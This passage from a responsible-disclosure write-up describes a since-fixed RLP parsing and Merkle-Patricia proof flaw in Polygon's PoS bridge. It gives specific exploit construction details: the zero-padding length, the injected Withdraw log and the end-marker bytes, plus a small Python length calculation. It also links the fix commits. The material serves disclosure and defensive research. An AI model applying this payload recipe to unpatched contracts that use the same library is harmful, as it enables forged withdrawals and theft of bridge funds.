In the code, we see indeed that on the 7th element the hash 8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205 is now placed. This hash is also included in the MPT proof in the final proof element (which is also the case for the real exit payload).

At the end of the normal exit payload (so after the log index), we see the things we need to add for the exploitation to work. This is a buffer of 57049 zeroes. This is due to the 0xb9e5f2 element that enables the jump but has an encoded length of 58866. We need only 57049 because the difference is going to be filled with the other bytes of the exit payload (the whole thing is loaded when making the external call), plus a few more bytes that were actually allocated in between.

The length of the buffer varies with the hash, but it is deterministic: for this hash and exploit it is always the same, and it depends on nothing but a simple one-time calculation beforehand.

Then we add the injected log, which is a list containing the emitter, another list of topics and the log's data. The log’s data that we inject here is the address of the standard Forge test contract as receiver, and the total balance of POL of the bridge on mainnet.

Finally we need the end marker, which is 0xbfffffffffffffffff. This is a long RLP string with the largest length possible. It makes sure that the .toList() parsing stops and doesn't cause out-of-gas when it tries to parse the 0xffdf9b8ea8546ba5b5 long-list element of the hash. This is possible because it only reads the length, it never allocates all that memory.
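The arithmetic behind the end marker can be checked directly. The sketch below uses a hypothetical item_length helper and assumes the counting loop runs while its cursor is below the end of the list; positions are measured from the start of the 0xff... list.

```python
def item_length(data: bytes) -> int:
    """Total length (header plus payload) claimed by the RLP item at data[0]."""
    prefix = data[0]
    if prefix < 0x80:
        return 1
    if prefix < 0xb8:
        return 1 + (prefix - 0x80)
    if prefix < 0xc0:
        n = prefix - 0xb7             # number of length bytes (long string)
        return 1 + n + int.from_bytes(data[1:1 + n], "big")
    if prefix < 0xf8:
        return 1 + (prefix - 0xc0)
    n = prefix - 0xf7                 # number of length bytes (long list)
    return 1 + n + int.from_bytes(data[1:1 + n], "big")


LOGS_HEADER = bytes.fromhex("ffdf9b8ea8546ba5b5")   # taken from the hash
END_MARKER = bytes.fromhex("bfffffffffffffffff")    # appended by the attacker

logs_len = item_length(LOGS_HEADER)    # where the list claims to end
marker_len = item_length(END_MARKER)   # how far one step over the marker jumps


def cursor_after_marker(marker_pos: int) -> int:
    """Cursor position (relative to the list start) after stepping over the marker."""
    return marker_pos + marker_len


# 60000 is an arbitrary illustrative position inside the list.
loop_stops = cursor_after_marker(60000) >= logs_len
```

Because the marker claims more bytes than the list itself, one step over it moves the cursor past the claimed end of the list regardless of where the marker sits.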

Impact

All that’s left is to simply call the exit function of the predicate with the malicious exit payload proof.

The vulnerability chain would have allowed an attacker to prove any event with arbitrary values, such as a Withdraw event for the full POL balance of the bridge. The attacker could have drained the entire TVL of the bridge in a single transaction.

Disclosure

The vulnerabilities described in this article were disclosed to the Polygon security team in July 2024. They were fixed shortly after.

The first fix was the addition of a total length check of the RLP item length inside of the toList function of the RLPReader library: https://github.com/0xPolygon/pos-contracts/commit/1fc270710bce2b79b47817759e8631a9cc901642.

The second fix was the addition of prefix checks for the extension and leaf nodes of the MPT in the MerklePatriciaProof library: https://github.com/0xPolygon/pos-contracts/commit/679c7368a97d3b3a56f63d35fd83f4d8fa48ff2c.

Suggested and merged fix in the RLPReader library:

https://github.com/hamdiallam/Solidity-RLP/pull/28

Further research

The RLPReader library was an external repository and as expected, the same library has been used in other projects. So before disclosing the fix and the bug to the public, I’ve done extensive research into the usage of this library by other projects.

Using our scalable contract analysis tool called Glider (https://hexens.io/solutions/glider/) I was able to do blazingly fast static analysis using code pattern queries on all verified smart contracts on Ethereum mainnet and other chains. This led me to a list of projects that were using this library for RLP parsing.

I have manually reviewed each one and identified one case where the project contained the same vulnerability. It has been responsibly disclosed and fixed. The other projects were using the library in a different way, resulting in the bug not being exploitable.

After reading this write-up, it’s obvious that this bug is not arbitrarily exploitable and it heavily depends on how the project uses it. For example, in the case of the ERC20PredicateBurnOnly, it is only exploitable because the call to the MPT verification function happens in between the parsing of the receipt and the parsing of the log. This allows for filling the memory. Had this call been after the parsing, it would not have worked.
